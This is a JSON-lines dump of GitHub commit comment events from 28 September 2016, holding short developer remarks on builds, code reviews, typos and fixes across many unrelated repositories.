{"id":"4632693756","type":"CommitCommentEvent","actor":{"login":"MadMikeDoc"},"repo":{"name":"mikesilvo164/skin.aeon.madnox"},"payload":{"comment":{"id":19212752,"position":null,"line":null,"path":null,"commit_id":"6374831fc9e0933976599218093a77530f489f63","created_at":"2016-09-28T18:58:32Z","updated_at":"2016-09-28T18:58:32Z","body":"Thanks Mike."}},"created_at":"2016-09-28T18:58:32Z"}
{"id":"4632696024","type":"CommitCommentEvent","actor":{"login":"mikermcneil"},"repo":{"name":"balderdashy/sails"},"payload":{"comment":{"id":19212758,"position":null,"line":null,"path":null,"commit_id":"d5ba8e848d090ccbd93cd69a3c2b52496e0ff1fb","created_at":"2016-09-28T18:58:56Z","updated_at":"2016-09-28T18:58:56Z","body":"Standard caveat:  This is a pre-release, and not intended for production use."}},"created_at":"2016-09-28T18:58:56Z"}
{"id":"4632697589","type":"CommitCommentEvent","actor":{"login":"maZahaca"},"repo":{"name":"findexchange/data-group-service"},"payload":{"comment":{"id":19212763,"position":19,"line":19,"path":"app.py","commit_id":"34402be0b1c1520c1af3ac69d6f673d4a1a7955d","created_at":"2016-09-28T18:59:13Z","updated_at":"2016-09-28T18:59:13Z","body":"I don't know about python, but in the other languages using of global variable is very bad"}},"created_at":"2016-09-28T18:59:13Z"}
{"id":"4632700118","type":"CommitCommentEvent","actor":{"login":"cooler-SAI"},"repo":{"name":"JadeEmu/JadeCore_547"},"payload":{"comment":{"id":19212773,"position":null,"line":null,"path":null,"commit_id":"7f39f0c4b8f22b24130101b634643f30d51cabfa","created_at":"2016-09-28T18:59:39Z","updated_at":"2016-09-28T18:59:39Z","body":"thanks )"}},"created_at":"2016-09-28T18:59:39Z"}
{"id":"4632702109","type":"CommitCommentEvent","actor":{"login":"xushWT"},"repo":{"name":"AllTheHaxx/AllTheHaxx"},"payload":{"comment":{"id":19212778,"position":null,"line":null,"path":null,"commit_id":"8d5ee48f4f9076caa164430810842dc6f199e7a0","created_at":"2016-09-28T18:59:59Z","updated_at":"2016-09-28T18:59:59Z","body":"Thx i spend hours on this"}},"created_at":"2016-09-28T18:59:59Z"}
{"id":"4632702546","type":"CommitCommentEvent","actor":{"login":"RobinsonMann"},"repo":{"name":"RobinsonMann/BWJSAL"},"payload":{"comment":{"id":19212780,"position":null,"line":null,"path":null,"commit_id":"854802446bb5aa8134c9a0ccd720ad4359ceab81","created_at":"2016-09-28T19:00:04Z","updated_at":"2016-09-28T19:00:04Z","body":"Simple typos. "}},"created_at":"2016-09-28T19:00:04Z"}
{"id":"4632704110","type":"CommitCommentEvent","actor":{"login":"amoose"},"repo":{"name":"18F/identity-idp"},"payload":{"comment":{"id":19212785,"position":null,"line":null,"path":null,"commit_id":"ca4b403b5168eead84931b70f97f3a6fd54e00d3","created_at":"2016-09-28T19:00:19Z","updated_at":"2016-09-28T19:00:19Z","body":"Either through a bug in babel-preset or browserify, this change was required to successfully compile assets 💁 "}},"created_at":"2016-09-28T19:00:19Z"}
{"id":"4632705584","type":"CommitCommentEvent","actor":{"login":"maZahaca"},"repo":{"name":"findexchange/data-group-service"},"payload":{"comment":{"id":19212788,"position":9,"line":9,"path":"app.py","commit_id":"34402be0b1c1520c1af3ac69d6f673d4a1a7955d","created_at":"2016-09-28T19:00:34Z","updated_at":"2016-09-28T19:00:34Z","body":"What is the reason to divide in two REST methods (return and upload)?"}},"created_at":"2016-09-28T19:00:34Z"}
{"id":"4632709645","type":"CommitCommentEvent","actor":{"login":"bornhaeusser"},"repo":{"name":"MarkusHiller/OpenSoccer"},"payload":{"comment":{"id":19212793,"position":null,"line":null,"path":null,"commit_id":"dd1e57a7b7bfb61d1354b33735135b2fe9f3d807","created_at":"2016-09-28T19:01:14Z","updated_at":"2016-09-28T19:01:14Z","body":"Error 500"}},"created_at":"2016-09-28T19:01:14Z"}
{"id":"4632712451","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19212800,"position":null,"line":null,"path":null,"commit_id":"6c7848bd6a41a7134ee1a70f3344a7f623da88a1","created_at":"2016-09-28T19:01:45Z","updated_at":"2016-09-28T19:01:45Z","body":"iteration (evanweaver) - x86_64-Linux-Ubuntu-14.04-clang-3.5: OK (2364 of 2448 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6c7848bd6a41a7134ee1a70f3344a7f623da88a1-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a> <a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6c7848bd6a41a7134ee1a70f3344a7f623da88a1-x86_64-Linux-Ubuntu-14.04-clang-3.5.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-96.57%25-yellow.svg)</a> \n"}},"created_at":"2016-09-28T19:01:45Z"}
{"id":"4632713428","type":"CommitCommentEvent","actor":{"login":"ElbertoOne"},"repo":{"name":"pb00068/Stockfish"},"payload":{"comment":{"id":19212805,"position":null,"line":null,"path":null,"commit_id":"9db33a66704211002584043d140659343d4f4d7f","created_at":"2016-09-28T19:01:55Z","updated_at":"2016-09-28T19:01:55Z","body":"You could try take 3 @LTC if only to check of it scales better than take 4"}},"created_at":"2016-09-28T19:01:55Z"}
{"id":"4632716110","type":"CommitCommentEvent","actor":{"login":"MarkusHiller"},"repo":{"name":"MarkusHiller/OpenSoccer"},"payload":{"comment":{"id":19212812,"position":null,"line":null,"path":null,"commit_id":"dd1e57a7b7bfb61d1354b33735135b2fe9f3d807","created_at":"2016-09-28T19:02:23Z","updated_at":"2016-09-28T19:02:23Z","body":"Welche php version nutzt ihr?\n\nAm 28.09.2016 21:01 schrieb \"bornhaeusser\" <notifications@github.com>:\n\n> Error 500\n>\n> —\n> You are receiving this because you authored the thread.\n> Reply to this email directly, view it on GitHub\n> <https://github.com/MarkusHiller/OpenSoccer/commit/dd1e57a7b7bfb61d1354b33735135b2fe9f3d807#commitcomment-19212793>,\n> or mute the thread\n> <https://github.com/notifications/unsubscribe-auth/ALhUZMswc0dYUaYUW_Eh6Wr1nlCYWT-6ks5qurl6gaJpZM4KJHNS>\n> .\n>\n"}},"created_at":"2016-09-28T19:02:23Z"}
{"id":"4632720233","type":"CommitCommentEvent","actor":{"login":"bornhaeusser"},"repo":{"name":"MarkusHiller/OpenSoccer"},"payload":{"comment":{"id":19212821,"position":null,"line":null,"path":null,"commit_id":"dd1e57a7b7bfb61d1354b33735135b2fe9f3d807","created_at":"2016-09-28T19:03:06Z","updated_at":"2016-09-28T19:03:06Z","body":"5.6"}},"created_at":"2016-09-28T19:03:06Z"}
{"id":"4632727029","type":"CommitCommentEvent","actor":{"login":"adrianhaith"},"repo":{"name":"BLAM-Lab-Projects/finger-6"},"payload":{"comment":{"id":19212839,"position":18,"line":18,"path":"data/analysis/analyzeForcedRTdata_all.m","commit_id":"0bbd4aa24bd1b15958ebdcc381d0f1f4feecac8b","created_at":"2016-09-28T19:04:21Z","updated_at":"2016-09-28T19:04:21Z","body":"yes. I just always habitually did it the other way, but load(F) is much better."}},"created_at":"2016-09-28T19:04:21Z"}
{"id":"4632727671","type":"CommitCommentEvent","actor":{"login":"Aldrog"},"repo":{"name":"lirios/lirios.github.io"},"payload":{"comment":{"id":19212842,"position":null,"line":null,"path":null,"commit_id":"d2640b781d56ca137448aacd2c06bcb4591acbea","created_at":"2016-09-28T19:04:29Z","updated_at":"2016-09-28T19:04:29Z","body":"It doesn't fit into mobile layout."}},"created_at":"2016-09-28T19:04:29Z"}
{"id":"4632727988","type":"CommitCommentEvent","actor":{"login":"JohnFriedman"},"repo":{"name":"bowenstrack/CSE2102-Laundry-Project"},"payload":{"comment":{"id":19212844,"position":1,"line":1,"path":"hello world","commit_id":"27404ecc939bb1d9920482c8c77f89ef3dc21341","created_at":"2016-09-28T19:04:33Z","updated_at":"2016-09-28T19:04:33Z","body":"Comment"}},"created_at":"2016-09-28T19:04:33Z"}
{"id":"4632728611","type":"CommitCommentEvent","actor":{"login":"adrianhaith"},"repo":{"name":"BLAM-Lab-Projects/finger-6"},"payload":{"comment":{"id":19212845,"position":55,"line":55,"path":"data/analysis/analyzeForcedRTdata_all.m","commit_id":"0bbd4aa24bd1b15958ebdcc381d0f1f4feecac8b","created_at":"2016-09-28T19:04:39Z","updated_at":"2016-09-28T19:04:39Z","body":"ha. Yes. Can you change it to \"fingerError\"?"}},"created_at":"2016-09-28T19:04:39Z"}
{"id":"4632729160","type":"CommitCommentEvent","actor":{"login":"eheydrick"},"repo":{"name":"chef-cookbooks/ntp"},"payload":{"comment":{"id":19212847,"position":6,"line":7,"path":"CHANGELOG.md","commit_id":"78b652b7d713f3ec543d74cc7e3dd189e53037dd","created_at":"2016-09-28T19:04:45Z","updated_at":"2016-09-28T19:04:45Z","body":"apparmor"}},"created_at":"2016-09-28T19:04:45Z"}
{"id":"4632731012","type":"CommitCommentEvent","actor":{"login":"eheydrick"},"repo":{"name":"chef-cookbooks/ntp"},"payload":{"comment":{"id":19212856,"position":7,"line":8,"path":"CHANGELOG.md","commit_id":"78b652b7d713f3ec543d74cc7e3dd189e53037dd","created_at":"2016-09-28T19:05:04Z","updated_at":"2016-09-28T19:05:04Z","body":"think you meant ntpdate."}},"created_at":"2016-09-28T19:05:04Z"}
{"id":"4632731537","type":"CommitCommentEvent","actor":{"login":"mikesilvo164"},"repo":{"name":"mikesilvo164/skin.aeon.madnox"},"payload":{"comment":{"id":19212857,"position":50,"line":153,"path":"1080i/SettingsCategory.xml","commit_id":"f16b8c37ab1de6f82e53e6278e0b6599bcf9f47f","created_at":"2016-09-28T19:05:11Z","updated_at":"2016-09-28T19:05:11Z","body":"@MadMikeDoc Should this one be focus texture not dialog?"}},"created_at":"2016-09-28T19:05:11Z"}
{"id":"4632732549","type":"CommitCommentEvent","actor":{"login":"lesveilleux"},"repo":{"name":"lesveilleux/oz"},"payload":{"comment":{"id":19212860,"position":null,"line":null,"path":null,"commit_id":"7929f4d49ff1756ff9c1a2bf8d47efa49f4d5b6b","created_at":"2016-09-28T19:05:22Z","updated_at":"2016-09-28T19:05:22Z","body":"This is a project to create a software to hardware control system using off the shelf components"}},"created_at":"2016-09-28T19:05:22Z"}
{"id":"4632732604","type":"CommitCommentEvent","actor":{"login":"bornhaeusser"},"repo":{"name":"MarkusHiller/OpenSoccer"},"payload":{"comment":{"id":19212861,"position":null,"line":null,"path":null,"commit_id":"dd1e57a7b7bfb61d1354b33735135b2fe9f3d807","created_at":"2016-09-28T19:05:22Z","updated_at":"2016-09-28T19:05:22Z","body":"muss auch an vielen stellen im code von dir ein . vor das / setzten\r\n\r\nz.b. require_once('./classes/I18N.php'); \r\n\r\nin zz1.php etc.. sind einige files die so angepasst werden mussten. (auch die neuen)"}},"created_at":"2016-09-28T19:05:22Z"}
{"id":"4632735076","type":"CommitCommentEvent","actor":{"login":"BrianHicks"},"repo":{"name":"asteris-llc/converge"},"payload":{"comment":{"id":19212864,"position":112,"line":71,"path":"resource/user/preparer.go","commit_id":"fd6d07c439ddea2fe242e92949fae2921753241c","created_at":"2016-09-28T19:05:50Z","updated_at":"2016-09-28T19:05:50Z","body":"this was fixed in ac37f1f9dcc128e13aea6574637323560edfb611"}},"created_at":"2016-09-28T19:05:50Z"}
{"id":"4632738492","type":"CommitCommentEvent","actor":{"login":"friedrichatgc"},"repo":{"name":"mbsim-env/mbsim"},"payload":{"comment":{"id":19212874,"position":null,"line":null,"path":null,"commit_id":"657aba9851d6bac898344e8a0db2f5b90478cb84","created_at":"2016-09-28T19:06:26Z","updated_at":"2016-09-28T19:06:26Z","body":"I think we should use a smaller end time to avoid the timeout and then update the reference.\r\nThe same applies to mechanics/flexible_body/flexible_crank_mechanism_fe.\r\nAnd for mechanics/flexible_body/sliding_mass_ffr we should try to fix the convergence problems to avoid the timeout."}},"created_at":"2016-09-28T19:06:26Z"}
{"id":"4632739085","type":"CommitCommentEvent","actor":{"login":"mikesilvo164"},"repo":{"name":"mikesilvo164/skin.aeon.madnox"},"payload":{"comment":{"id":19212877,"position":14,"line":78,"path":"1080i/SettingsCategory.xml","commit_id":"f16b8c37ab1de6f82e53e6278e0b6599bcf9f47f","created_at":"2016-09-28T19:06:33Z","updated_at":"2016-09-28T19:06:33Z","body":"@MadMikeDoc Should this one be focus texture not dialog?"}},"created_at":"2016-09-28T19:06:33Z"}
{"id":"4632741287","type":"CommitCommentEvent","actor":{"login":"BrianHicks"},"repo":{"name":"asteris-llc/converge"},"payload":{"comment":{"id":19212880,"position":112,"line":71,"path":"resource/user/preparer.go","commit_id":"fd6d07c439ddea2fe242e92949fae2921753241c","created_at":"2016-09-28T19:06:59Z","updated_at":"2016-09-28T19:06:59Z","body":"derp, that should have been 9510049482a5f118d414d7e0ea48adcf8821ed60"}},"created_at":"2016-09-28T19:06:59Z"}
{"id":"4632742715","type":"CommitCommentEvent","actor":{"login":"nkhalaieff"},"repo":{"name":"nkhalaieff/fin4ds"},"payload":{"comment":{"id":19212883,"position":null,"line":null,"path":null,"commit_id":"8122f6264114a66024ff7e0e3182afa08bc62dbe","created_at":"2016-09-28T19:07:14Z","updated_at":"2016-09-28T19:07:14Z","body":"Looks Good, I approve these changes."}},"created_at":"2016-09-28T19:07:14Z"}
{"id":"4632743336","type":"CommitCommentEvent","actor":{"login":"lucasoli"},"repo":{"name":"rathena/rathena"},"payload":{"comment":{"id":19212884,"position":null,"line":null,"path":null,"commit_id":"f4f4367c522825735f7f3dc6f1ddb7a409ef6444","created_at":"2016-09-28T19:07:20Z","updated_at":"2016-09-28T19:07:20Z","body":"Thank you @aleos89 ! You are awesome!"}},"created_at":"2016-09-28T19:07:20Z"}
{"id":"4632743754","type":"CommitCommentEvent","actor":{"login":"nrel-bot-2"},"repo":{"name":"NREL/OpenStudio"},"payload":{"comment":{"id":19212886,"position":null,"line":null,"path":null,"commit_id":"6c7848bd6a41a7134ee1a70f3344a7f623da88a1","created_at":"2016-09-28T19:07:25Z","updated_at":"2016-09-28T19:07:25Z","body":"iteration (evanweaver) - x86_64-Linux-Ubuntu-14.04-cppcheck-1.61: OK (0 of 0 tests passed, 0 test warnings)\n\n\n\n<a href='https://nrel.github.io/OpenStudioBuildResults/OpenStudio-6c7848bd6a41a7134ee1a70f3344a7f623da88a1-x86_64-Linux-Ubuntu-14.04-cppcheck-1.61.html'>![Build Badge](http://img.shields.io/badge/build%20status-warnings-yellow.svg)</a>  \n"}},"created_at":"2016-09-28T19:07:25Z"}
{"id":"4632746269","type":"CommitCommentEvent","actor":{"login":"SunyataZero"},"repo":{"name":"peoples-fund/peoples-fund"},"payload":{"comment":{"id":19212890,"position":142,"line":145,"path":"docs/req-spec.md","commit_id":"fd5e3f391bf331f2a7b0df9864e0f7a2c3d0bfab","created_at":"2016-09-28T19:07:53Z","updated_at":"2016-09-28T19:07:53Z","body":"Sorry to nitpick but if we want to see the \"History of one-time donations visible for user\" (see above) we need to connect the donations made by logged in users to their account. I will create a new requirement for donations for non-members"}},"created_at":"2016-09-28T19:07:53Z"}
{"id":"4632752090","type":"CommitCommentEvent","actor":{"login":"MadMikeDoc"},"repo":{"name":"mikesilvo164/skin.aeon.madnox"},"payload":{"comment":{"id":19212906,"position":50,"line":153,"path":"1080i/SettingsCategory.xml","commit_id":"f16b8c37ab1de6f82e53e6278e0b6599bcf9f47f","created_at":"2016-09-28T19:08:58Z","updated_at":"2016-09-28T19:08:58Z","body":"May have got some wrong, was having problems at first so changing VÀŔ to test, will sort it out, thanks Mike."}},"created_at":"2016-09-28T19:08:58Z"}
{"id":"4632758115","type":"CommitCommentEvent","actor":{"login":"datakurre"},"repo":{"name":"puffnfresh/nix-files"},"payload":{"comment":{"id":19212911,"position":null,"line":null,"path":null,"commit_id":"cf67ff0fdc0c1517b10693556a868610fdb02dde","created_at":"2016-09-28T19:10:06Z","updated_at":"2016-09-28T19:10:06Z","body":"@puffnfresh Is it possible to start configured services (systemd) in a Docker container from image created like this?"}},"created_at":"2016-09-28T19:10:06Z"}
{"id":"4632762159","type":"CommitCommentEvent","actor":{"login":"ketersu"},"repo":{"name":"steven7851/livestreamer"},"payload":{"comment":{"id":19212919,"position":null,"line":null,"path":null,"commit_id":"6bbb6cf279096c6c8e90437e72494a663ef7b50e","created_at":"2016-09-28T19:10:48Z","updated_at":"2016-09-28T19:10:48Z","body":"It works! thanks :)"}},"created_at":"2016-09-28T19:10:48Z"}
{"id":"4632766401","type":"CommitCommentEvent","actor":{"login":"mikesilvo164"},"repo":{"name":"mikesilvo164/skin.aeon.madnox"},"payload":{"comment":{"id":19212927,"position":50,"line":153,"path":"1080i/SettingsCategory.xml","commit_id":"f16b8c37ab1de6f82e53e6278e0b6599bcf9f47f","created_at":"2016-09-28T19:11:38Z","updated_at":"2016-09-28T19:11:38Z","body":"Just let me know if you need any help or want me to do something... I have more free time now that one of my kids started pre-school 😉 "}},"created_at":"2016-09-28T19:11:38Z"}
{"id":"4632769032","type":"CommitCommentEvent","actor":{"login":"Ordenkrieger"},"repo":{"name":"chautruongthinh/android_frameworks_av"},"payload":{"comment":{"id":19212932,"position":null,"line":null,"path":null,"commit_id":"1b8a0f9d93f8ec588bc03291bed4d2fb579f5fae","created_at":"2016-09-28T19:12:06Z","updated_at":"2016-09-28T19:12:06Z","body":"Hey will need this commit or the build will break: https://github.com/CyanogenMod/android_frameworks_av/commit/60a9f3869d1f4ebb0a13404c7a19fcd5737b0071"}},"created_at":"2016-09-28T19:12:06Z"}
{"id":"4632769423","type":"CommitCommentEvent","actor":{"login":"testn"},"repo":{"name":"netty/netty-tcnative"},"payload":{"comment":{"id":19212934,"position":null,"line":null,"path":null,"commit_id":"2f7d38fa68b007c3f761d226e09cc6ec0efc9b97","created_at":"2016-09-28T19:12:09Z","updated_at":"2016-09-28T19:12:09Z","body":"Thanks. I was worried since I notice https://github.com/netty/netty-tcnative/blob/1.1.33/openssl-static"}},"created_at":"2016-09-28T19:12:09Z"}
{"id":"4632769655","type":"CommitCommentEvent","actor":{"login":"msterin"},"repo":{"name":"vmware/docker-volume-vsphere"},"payload":{"comment":{"id":19212936,"position":null,"line":null,"path":null,"commit_id":"ff1e9d515110c100b18dc3edc42469dad83cc310","created_at":"2016-09-28T19:12:12Z","updated_at":"2016-09-28T19:12:12Z","body":"I agree that the expected concurrency is low in normal condition. \r\nI think basic testing (parallel requests) is a must, the rest is nice to have. \r\n\r\n//CC @kerneltime @pdhamdhere "}},"created_at":"2016-09-28T19:12:12Z"}
{"id":"4632770227","type":"CommitCommentEvent","actor":{"login":"fitzyjoe"},"repo":{"name":"benmcollins/libjwt"},"payload":{"comment":{"id":19212939,"position":null,"line":null,"path":null,"commit_id":"c5dd773cc2709ac7cc068778cf96fa3b2ddcfe57","created_at":"2016-09-28T19:12:19Z","updated_at":"2016-09-28T19:12:19Z","body":"I had to get rid of -Werror to get my tests to compile.  It was complaining about unused args to the main methods."}},"created_at":"2016-09-28T19:12:19Z"}
{"id":"4632774294","type":"CommitCommentEvent","actor":{"login":"edwarddekker"},"repo":{"name":"aramk/crayon-syntax-highlighter"},"payload":{"comment":{"id":19212952,"position":null,"line":null,"path":null,"commit_id":"6443abecd845db75cb0cb8e7df5d590a55babba0","created_at":"2016-09-28T19:13:08Z","updated_at":"2016-09-28T19:13:08Z","body":"Please, push this update to the WordPress Repository to update all."}},"created_at":"2016-09-28T19:13:08Z"}
{"id":"4632776143","type":"CommitCommentEvent","actor":{"login":"agamemnonc"},"repo":{"name":"agamemnonc/iaml"},"payload":{"comment":{"id":19212956,"position":null,"line":null,"path":null,"commit_id":"390a784f989829e672acb2bee229aa28c2e03cb8","created_at":"2016-09-28T19:13:29Z","updated_at":"2016-09-28T19:13:29Z","body":"No problem. I didn't bother checking either, there was another student posting an issue on the iaml repo."}},"created_at":"2016-09-28T19:13:29Z"}
{"id":"4632779426","type":"CommitCommentEvent","actor":{"login":"fitzyjoe"},"repo":{"name":"benmcollins/libjwt"},"payload":{"comment":{"id":19212966,"position":null,"line":null,"path":null,"commit_id":"c5dd773cc2709ac7cc068778cf96fa3b2ddcfe57","created_at":"2016-09-28T19:14:09Z","updated_at":"2016-09-28T19:14:09Z","body":"One more thing... I had to get rid of \"rt\" when compiling on OSX.  On both CentOS and OSX I had to remove subunit.  Is that a ubuntu-only thing?"}},"created_at":"2016-09-28T19:14:09Z"}
{"id":"4632780012","type":"CommitCommentEvent","actor":{"login":"MadMikeDoc"},"repo":{"name":"mikesilvo164/skin.aeon.madnox"},"payload":{"comment":{"id":19212968,"position":50,"line":153,"path":"1080i/SettingsCategory.xml","commit_id":"f16b8c37ab1de6f82e53e6278e0b6599bcf9f47f","created_at":"2016-09-28T19:14:14Z","updated_at":"2016-09-28T19:14:14Z","body":"Thanks Mike will do, actually can you remember where you got to with krypton required changes?"}},"created_at":"2016-09-28T19:14:14Z"}
{"id":"4632780910","type":"CommitCommentEvent","actor":{"login":"frankleonrose"},"repo":{"name":"things-nyc/mapthethings-ios"},"payload":{"comment":{"id":19212969,"position":null,"line":null,"path":null,"commit_id":"12489fa9a7969e5abdf4dc371f982c9498021658","created_at":"2016-09-28T19:14:25Z","updated_at":"2016-09-28T19:14:25Z","body":"Fixed #4 "}},"created_at":"2016-09-28T19:14:25Z"}
{"id":"4632781855","type":"CommitCommentEvent","actor":{"login":"kannoth"},"repo":{"name":"kannoth/DRAMPower"},"payload":{"comment":{"id":19212972,"position":53,"line":53,"path":"memspecs/modified_MICRON_1Gb_DDR3-1600_8bit_G_3s.xml","commit_id":"e8ee102a651e0cadc673a373c9f1cad553c76967","created_at":"2016-09-28T19:14:36Z","updated_at":"2016-09-28T19:14:36Z","body":"Yes,  you are right. I assumed that the ρ = 100%, which makes Ione = Idd3n. As it is impossible to specify Ione in the memory specification, I used the pessimistic value.\r\nHowever in the code it is like this  I have used a local variable \"idd5Blocal\" to change the configuration based of the specification is present in the memory spec or not. Please see the snippet.\r\n[snippet](https://github.com/kannoth/DRAMPower/blob/master/src/MemoryPowerModel.cc#L201)"}},"created_at":"2016-09-28T19:14:36Z"}
{"id":"4632782812","type":"CommitCommentEvent","actor":{"login":"MarkusHiller"},"repo":{"name":"MarkusHiller/OpenSoccer"},"payload":{"comment":{"id":19212973,"position":null,"line":null,"path":null,"commit_id":"dd1e57a7b7bfb61d1354b33735135b2fe9f3d807","created_at":"2016-09-28T19:14:47Z","updated_at":"2016-09-28T19:14:47Z","body":"Scheinbar funktioniert das phat system bei dir anders. Du hast sicher Linux drauf? Ersetz mal das dirname (__DIR) durch dein punktsystem."}},"created_at":"2016-09-28T19:14:47Z"}
{"id":"4632785684","type":"CommitCommentEvent","actor":{"login":"normanmaurer"},"repo":{"name":"netty/netty-tcnative"},"payload":{"comment":{"id":19212980,"position":null,"line":null,"path":null,"commit_id":"2f7d38fa68b007c3f761d226e09cc6ec0efc9b97","created_at":"2016-09-28T19:15:21Z","updated_at":"2016-09-28T19:15:21Z","body":"@testn yep... this is only provided for users to build it by themselves. We not publish any release of it."}},"created_at":"2016-09-28T19:15:21Z"}
{"id":"4632786876","type":"CommitCommentEvent","actor":{"login":"kyliedale"},"repo":{"name":"nio-blocks/oauth2_mixin"},"payload":{"comment":{"id":19212983,"position":5,"line":80,"path":"oauth2_base.py","commit_id":"f01394d9d815279d494a26ea04f5816fe1ba7da1","created_at":"2016-09-28T19:15:34Z","updated_at":"2016-09-28T19:15:34Z","body":"@hansmosh can I get your opinion on this? I have not seen a case where `filename.file` is something other than `None`, at least from the tests I have run against the function, but I am under the impression that that is how you get the file object. "}},"created_at":"2016-09-28T19:15:34Z"}
{"id":"4632797828","type":"CommitCommentEvent","actor":{"login":"mikesilvo164"},"repo":{"name":"mikesilvo164/skin.aeon.madnox"},"payload":{"comment":{"id":19213011,"position":50,"line":153,"path":"1080i/SettingsCategory.xml","commit_id":"f16b8c37ab1de6f82e53e6278e0b6599bcf9f47f","created_at":"2016-09-28T19:17:34Z","updated_at":"2016-09-28T19:17:34Z","body":"I missed a thing or two along the way but other than cleanup the last thing I did was Window names.\r\n\r\nI know MyPlaylist still needs to be updated but I will check the Skinning Changes thread to see what else I skipped and edit this post.\r\n\r\nBRB"}},"created_at":"2016-09-28T19:17:34Z"}
{"id":"4632798203","type":"CommitCommentEvent","actor":{"login":"mehmetozkan"},"repo":{"name":"mehmetozkan/GameProject"},"payload":{"comment":{"id":19213012,"position":2,"line":2,"path":"README.md","commit_id":"d4849c10accf177a2add54a88fb6b189605316df","created_at":"2016-09-28T19:17:38Z","updated_at":"2016-09-28T19:17:38Z","body":"Java Game Project\r\n![Image of Yaktocat](http://i65.tinypic.com/kc1piw.jpg)"}},"created_at":"2016-09-28T19:17:38Z"}
{"id":"4632802476","type":"CommitCommentEvent","actor":{"login":"ccshan"},"repo":{"name":"hakaru-dev/hakaru"},"payload":{"comment":{"id":19213026,"position":null,"line":null,"path":null,"commit_id":"33c8ef733afe39a26437587d5a775b4d93a8f5c7","created_at":"2016-09-28T19:18:27Z","updated_at":"2016-09-28T19:18:27Z","body":"I'm curious: Why fork language-c?"}},"created_at":"2016-09-28T19:18:27Z"}
{"id":"4632809253","type":"CommitCommentEvent","actor":{"login":"filran"},"repo":{"name":"filran/VisAr3D-Dynamic-Ultimate"},"payload":{"comment":{"id":19213045,"position":22,"line":29,"path":"Assets/Scripts/View/Visar3DDynamic.cs","commit_id":"312c8f38ca9be7a5d4428f458efd574553780706","created_at":"2016-09-28T19:19:46Z","updated_at":"2016-09-28T19:19:46Z","body":"Objeto? Vc fala os prefabs? Enfim... depois q atualizei meu repositório tive que arrastar o script Visar3ddynamic.cs e os prefabs tudo outra vez. "}},"created_at":"2016-09-28T19:19:46Z"}
{"id":"4632811461","type":"CommitCommentEvent","actor":{"login":"KrzysztofCwalina"},"repo":{"name":"dotnet/corefxlab"},"payload":{"comment":{"id":19213052,"position":null,"line":null,"path":null,"commit_id":"292ea78eecb4b6ec7cc35d7e4c59a010cf59fd54","created_at":"2016-09-28T19:20:11Z","updated_at":"2016-09-28T19:20:11Z","body":"Yeah, it would be interesting to implement the abstraction over some disposable resource (e.g. enumerating files in a folder) to see how it would work. I might try to do it in spare time."}},"created_at":"2016-09-28T19:20:11Z"}
{"id":"4632812974","type":"CommitCommentEvent","actor":{"login":"dmirogin"},"repo":{"name":"dmirogin/backuper"},"payload":{"comment":{"id":19213054,"position":1,"line":1,"path":"src/bin/backuper","commit_id":"a7567e7a638f81639b98f2fe7dee05f907039753","created_at":"2016-09-28T19:20:26Z","updated_at":"2016-09-28T19:20:26Z","body":"Спасибо, поправил."}},"created_at":"2016-09-28T19:20:26Z"}
{"id":"4632814383","type":"CommitCommentEvent","actor":{"login":"aforren1"},"repo":{"name":"BLAM-Lab-Projects/finger-6"},"payload":{"comment":{"id":19213062,"position":55,"line":55,"path":"data/analysis/analyzeForcedRTdata_all.m","commit_id":"0bbd4aa24bd1b15958ebdcc381d0f1f4feecac8b","created_at":"2016-09-28T19:20:43Z","updated_at":"2016-09-28T19:20:43Z","body":"yep no problem"}},"created_at":"2016-09-28T19:20:43Z"}
{"id":"4632816027","type":"CommitCommentEvent","actor":{"login":"knightvmk"},"repo":{"name":"knightvmk/mp2-lab1-set"},"payload":{"comment":{"id":19213070,"position":4,"line":19,"path":"src/tbitfield.cpp","commit_id":"f1ca089cdc6eb8d57e454170e35964f833a3ca7f","created_at":"2016-09-28T19:21:02Z","updated_at":"2016-09-28T19:21:02Z","body":"уже удалено"}},"created_at":"2016-09-28T19:21:02Z"}
{"id":"4632816509","type":"CommitCommentEvent","actor":{"login":"gatepoet"},"repo":{"name":"gatepoet/eCademy.NUh15.PhotoShare"},"payload":{"comment":{"id":19213073,"position":null,"line":null,"path":null,"commit_id":"c6147eb0e312b049b66ff71ebe3b4558eafe4c4c","created_at":"2016-09-28T19:21:08Z","updated_at":"2016-09-28T19:21:08Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Basic .net MVC website](https://trello.com/c/uaU75K9A/20-basic-net-mvc-website)"}},"created_at":"2016-09-28T19:21:08Z"}
{"id":"4632817180","type":"CommitCommentEvent","actor":{"login":"gatepoet"},"repo":{"name":"gatepoet/eCademy.NUh15.PhotoShare"},"payload":{"comment":{"id":19213075,"position":null,"line":null,"path":null,"commit_id":"9eb78631324ff1e631d3eb3df303ddc073bc590c","created_at":"2016-09-28T19:21:15Z","updated_at":"2016-09-28T19:21:15Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Basic .net MVC website](https://trello.com/c/uaU75K9A/20-basic-net-mvc-website)"}},"created_at":"2016-09-28T19:21:15Z"}
{"id":"4632817879","type":"CommitCommentEvent","actor":{"login":"gatepoet"},"repo":{"name":"gatepoet/eCademy.NUh15.PhotoShare"},"payload":{"comment":{"id":19213078,"position":null,"line":null,"path":null,"commit_id":"a3463d42bc2a0596e13e4064ac0a882402ab91e0","created_at":"2016-09-28T19:21:23Z","updated_at":"2016-09-28T19:21:23Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Basic .net MVC website](https://trello.com/c/uaU75K9A/20-basic-net-mvc-website)"}},"created_at":"2016-09-28T19:21:23Z"}
{"id":"4632818515","type":"CommitCommentEvent","actor":{"login":"gatepoet"},"repo":{"name":"gatepoet/eCademy.NUh15.PhotoShare"},"payload":{"comment":{"id":19213081,"position":null,"line":null,"path":null,"commit_id":"219ceec05d67654c90888d6054a0c3a6196632f2","created_at":"2016-09-28T19:21:31Z","updated_at":"2016-09-28T19:21:31Z","body":"![](https://github.trello.services/images/mini-trello-icon.png) [Basic .net MVC website](https://trello.com/c/uaU75K9A/20-basic-net-mvc-website)"}},"created_at":"2016-09-28T19:21:31Z"}
